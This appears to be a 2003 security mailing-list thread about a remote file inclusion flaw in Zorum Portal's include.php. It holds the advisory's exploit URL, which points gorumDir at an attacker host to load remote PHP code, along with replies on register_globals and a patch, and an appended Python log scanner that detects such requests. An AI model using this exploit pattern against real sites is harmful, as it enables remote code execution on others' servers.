Re: Zorum Portal (PHP)

2003-01-30 Thread MightyE
Messer wrote:

> Hello MGHz,
>
> In new versions of PHP (PHP 4.2.3 and higher) for reception of values
> transmitted to the form it's necessary to write:
>
> $Variable = $HTTP_GET_VARS ['var']; // Request Method - GET
> or
> $Variable = $HTTP_POST_VARS ['var']; // Request Method - POST
>
> // example: http://host.com/script.php?var1=value1&var2=value2
> $Var_1 = $HTTP_GET_VARS['var1'];
> $Var_2 = $var2;
> // $Var_1 == "value1"
> // $Var_2 == ""
>
> Messer.

Actually that's just the default.  As per 
http://www.php.net/manual/tw/configuration.directives.php#ini.register-globals 
it is still possible to configure PHP to register global variables such 
as $HTTP_POST_VARS['var'] as root level global variables, where your 
above example would render $Var_2 == "value2".  This is a directive set 
in the php.ini file, and frequently required for reverse compatibility. 
Setting register_globals to false in php.ini will circumvent many such 
attacks, though it may break some scripts.  The fact that it now 
defaults to false will hopefully keep developers using $_POST, $_GET, 
$HTTP_POST_VARS, and $HTTP_GET_VARS, which is far more secure.

-MightyE



Re[2]: Zorum Portal (PHP)

2003-01-29 Thread Messer
Hello MGHz,

>>From: MGhz <[EMAIL PROTECTED]>
>>To: [EMAIL PROTECTED]
>>Subject: Zorum Portal  (PHP)
>>Date: 22 Jan 2003 19:45:26 -
>>
>>
>>
>>Version : 3.0;3.1;3.2
>>Website : http://zorum.phpoutsourcing.com/
>>Problem : Include file
>>
>>
>>File:
>>-
>>include.php
>>-
>>
>>PHP Code:
>>-
>>[...]
>>include("$gorumDir/generformlib_multipleselection.php");
>>include("$gorumDir/generformlib_groupselection.php");
>>include("$gorumDir/generformlib_filebutton.php");
>>include("$gorumDir/group.php");
>>[...]
>>-
>>
>>Exploit :
>>-
>>http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
>>-->
>>include http://[attacker]/group.php on remote server
>>-
>>
>>--
>>[EMAIL PROTECTED]

In new versions of PHP (PHP 4.2.3 and higher) for reception of values
transmitted to the form it's necessary to write:

$Variable = $HTTP_GET_VARS ['var']; // Request Method - GET
or
$Variable = $HTTP_POST_VARS ['var']; // Request Method - POST


// example: http://host.com/script.php?var1=value1&var2=value2
$Var_1 = $HTTP_GET_VARS['var1'];
$Var_2 = $var2;
// $Var_1 == "value1"
// $Var_2 == ""

Messer.




Re: Zorum Portal (PHP)

2003-01-27 Thread Frog Man
A patch has been created for this hole and can be found on 
http://www.phpsecure.org/.






From: MGhz <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Zorum Portal  (PHP)
Date: 22 Jan 2003 19:45:26 -



Version : 3.0;3.1;3.2
Website : http://zorum.phpoutsourcing.com/
Problem : Include file


File:
-
include.php
-

PHP Code:
-
[...]
include("$gorumDir/generformlib_multipleselection.php");
include("$gorumDir/generformlib_groupselection.php");
include("$gorumDir/generformlib_filebutton.php");
include("$gorumDir/group.php");
[...]
-

Exploit :
-
http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
-->
include http://[attacker]/group.php on remote server
-

--
[EMAIL PROTECTED]








Zorum Portal (PHP)

2003-01-22 Thread MGhz


Version : 3.0;3.1;3.2
Website : http://zorum.phpoutsourcing.com/
Problem : Include file


File:
-
include.php
-

PHP Code:
-
[...]
include("$gorumDir/generformlib_multipleselection.php");
include("$gorumDir/generformlib_groupselection.php");
include("$gorumDir/generformlib_filebutton.php");
include("$gorumDir/group.php");
[...]
-

Exploit :
-
http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
-->
include http://[attacker]/group.php on remote server
-

--
[EMAIL PROTECTED]
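
Added example, not part of the original thread or of Zorum's code: a check over web server access logs for the request pattern in the advisory above, flagging any query parameter whose decoded value begins with a URL scheme. It generalizes from gorumDir to every parameter; the log lines, addresses, host names and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value starting with a URL scheme is what turns
# include("$gorumDir/group.php") into a fetch from another host.
SCHEME_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample entries (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [22/Jan/2003:19:40:01 +0000] "GET /forum/index.php?page=2 HTTP/1.0" 200 5120',
    '203.0.113.9 - - [22/Jan/2003:19:46:10 +0000] "GET /forum/include.php?gorumDir=http://remote.example/ HTTP/1.0" 200 312',
    '203.0.113.9 - - [22/Jan/2003:19:46:15 +0000] "GET /forum/include.php?gorumDir=http%3A%2F%2Fremote.example%2F HTTP/1.0" 200 312',
    '198.51.100.7 - - [22/Jan/2003:19:50:33 +0000] "GET /forum/include.php?gorumDir=./gorum HTTP/1.0" 200 298',
]


def url_valued_params(log_line):
    """Return [(path, param, decoded_value)] for parameters whose value is a URL."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    hits = []
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        decoded = unquote(value)
        if SCHEME_RE.match(decoded):
            hits.append((target.path, name, decoded))
    return hits


def scan(lines):
    """Return [(line_number, path, param, value)] for every flagged entry."""
    return [(n, *hit) for n, line in enumerate(lines, 1)
            for hit in url_valued_params(line)]


if __name__ == "__main__":
    for n, path, name, value in scan(SAMPLE_LOG):
        print(f"line {n}: {path} parameter {name!r} carries URL {value!r}")
```

Parameters that legitimately carry a URL are flagged as well, so review hits by script path before treating them as include attempts.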